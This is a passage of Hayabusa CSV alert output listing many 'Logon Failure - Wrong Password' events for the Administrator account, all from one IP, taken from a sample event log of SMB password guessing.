NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDadVFtE4toNiagy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.601 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnydJjDBdzJWqmWa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.652 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW8im2IhNzrGoSFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTzlqq9HLEX6wzdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.785 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz98aGXd0fdVzmTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.812 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2zOy64cp6dXelNl | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.858 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X1BflxNjQRNopjb4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.914 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 401ulFeuzCtp5lPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p0SIzJrzkseFB1j8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cyQMxtEdbud8iJLI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gbjIqxD4E6fYsGx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.084 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
rEeZEcj63sBddCsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.120 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiATfqYtrH9LoqR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.169 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PG3HB3GqFwQFLdcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.216 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G8NU6WRdrq9DxM6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.258 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cvZKIkI2aeBzbwe0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EE7AL3nJ7qsnk4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.331 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: feu34D0VvoMrnWzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.369 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrNRIpCpmAV3npax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.401 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zpxgEvvoC0stFdTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.445 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XvpDKRAPDS36sqNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.496 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4cqJKEIySxiQdCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.535 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm1F7QEwBE054ui0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: RvIjhyfdlXiX72Es | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.622 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJilW4KgIEeh5VNr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.668 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Ka0FYYdVOj90l0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.715 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9ZjGE8T6RuGx8SZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.758 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkti4BGVrpoAQRBL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.804 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZy2YJPOg1YZ2bd0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: rUE6E9H9i0l0P7Jp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.892 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Pkpt2nmRorQ3x0o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.937 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCZNNzSyi4mLLaxZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.986 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O9ZqF43sDjSirvMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.041 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XOw9DjHISDX57XUe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.083 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rmxFpEQeGsgbXpDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.129 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfIVCOOWQS7TNKQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.172 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uweLaLhvznDee1IF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.221 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oNQcS2BonF12ikiX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.265 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D43Flf2keSL3aph6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.307 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zw7nJXNHZ2QNa3In | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.352 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UZp4567BIWAwxF9r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:22.397 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9iVvPuykq62pV9z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.431 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRVomETC34InuKPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.473 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VpHfjKgAxChSYz8R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.520 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tIbTy5IDRy90lbUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.565 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mM6Olq0zYkMlwmrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.610 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUehtGEh0EqRHiLP | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhZ2KHmCTonGrXSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.696 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZea5qiet7vrT3iv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.741 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNWY8kuJMSy8h0Zk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.781 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bt9DUQ0mwhkJlTt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.828 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zXYtsM2MMuNSYtVr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.880 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgzvsdMN2SU7Knlh | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.971 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxiBYXNCY32yNb6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVfJmOxvsp75g3a0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.048 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHp1hlHjD8w3WKt3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.093 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEeJWAJgOeueYSM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.136 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tOfPGoUXu932L80d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.181 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
NbH4R6GK1PIVT3ij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.220 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgsJokRd07Nh1lO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.273 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 11ylyxQyV5HCJ18g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.322 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Am2qI1ya4wYdqErV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.374 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2AmZsYUYmDpWZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.421 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c0Hd8xWxOxFifJBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.461 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: hlh64Gtfoig2uzOY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.522 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LtK8Hj2kf3dfFSnW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.562 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VKUPqxtNqkVqXgTg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.605 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SKSxp87CBg8L8wSi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CpvxvR0ftQs1gdEF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.684 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9RGDzNMt9fM6rLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.730 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: RvOO9NLhbbKJXQq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.777 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mDB9bIx7LcoJ6IAU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.822 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfJWsGqlQTmFUUPT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.869 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9PRIO3MASsjrdQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.906 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9QCn4nZHB0ENeA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.961 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4iUNHB1gE2d1dBfZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:24.001 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
